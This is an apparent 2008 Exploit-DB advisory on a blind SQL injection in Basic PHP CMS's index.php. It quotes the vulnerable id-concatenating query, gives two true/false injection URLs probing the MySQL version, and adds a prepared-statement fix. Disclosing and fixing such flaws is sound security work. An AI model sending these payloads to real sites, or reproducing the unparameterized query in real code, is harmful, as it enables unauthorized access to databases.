Basic-CMS - Blind SQL Injection

EDB-ID: 7261
Platform: PHP
Date: 2008-11-28

==================================================================
  Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability
==================================================================


AUTHOR : CWH Underground
DATE   : 27 November 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Basic PHP CMS
 DOWNLOAD    : http://www.content-management-software.us/basiccms.zip
#####################################################

--- Blind SQL Injection ---

-----------------------------
 Vulnerable File (index.php)
-----------------------------

if ($strID != "")
{
	// $strID is concatenated into the query unquoted and unvalidated:
	// this is the injection point.
	$strsql = "SELECT description ";
	$strsql .=" FROM pages_t_details ";
	$strsql .=" WHERE id=$strID";
	$conclass =new DataBase();
	$rst= $conclass->Execute ($strsql,$strError);
	if ($strError=="")
	{
		while ($line = mysql_fetch_array($rst, MYSQL_ASSOC))
		{
			$strDetails=$line['description'];
		}
	}
}

---------
 Exploit
---------

Test for blind SQL injection on MySQL version 5

True
[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=5--

False
[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=4--
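
-----------------------
 Fix (added example)
-----------------------

The true/false difference above exists because $strID is placed unquoted into the WHERE clause. The following is an added example, not code from Basic PHP CMS or from the advisory authors, showing the same lookup with the id validated and bound as a parameter. It assumes a mysqli connection with placeholder credentials in place of the CMS's DataBase class, that $strID is read from the "id" query-string parameter, and the helper name fetch_page_description is hypothetical.

```php
<?php
// Added example (not Basic PHP CMS code): the index.php lookup with the id
// validated and bound as a parameter instead of concatenated into the SQL.
// Assumptions: mysqli is available, the connection values are placeholders,
// and $strID comes from the "id" query-string parameter.

function fetch_page_description(mysqli $db, $rawId): ?string
{
    // Accept only a plain positive integer. A value such as
    // "1 and substring(@@version,1,1)=5--" fails here and is never queried.
    $id = filter_var($rawId, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // The id travels as typed data ('i' = integer), separate from the SQL text.
    // On PHP 8.1+ mysqli throws mysqli_sql_exception on failure by default;
    // the false checks cover configurations where error reporting is off.
    $stmt = $db->prepare('SELECT description FROM pages_t_details WHERE id = ?');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $id);
    $description = null;
    if ($stmt->execute()) {
        $stmt->bind_result($description);
        if ($stmt->fetch() !== true) {   // null = no row, false = error
            $description = null;
        }
    }
    $stmt->close();
    return $description;
}

// Placeholder connection values (constructed for this example).
$db = new mysqli('localhost', 'cms_user', 'placeholder-password', 'cms_db');

$strDetails = '';
$strID = $_GET['id'] ?? '';
if ($strID !== '') {
    $description = fetch_page_description($db, $strID);
    if ($description === null) {
        http_response_code(404);   // same response for invalid and unknown ids
    } else {
        $strDetails = $description;
    }
}
```

With this change both request forms shown under "Exploit" are rejected at validation and return the same response, so the page no longer answers true/false questions about the database.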


#######################################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################

# milw0rm.com [2008-11-28]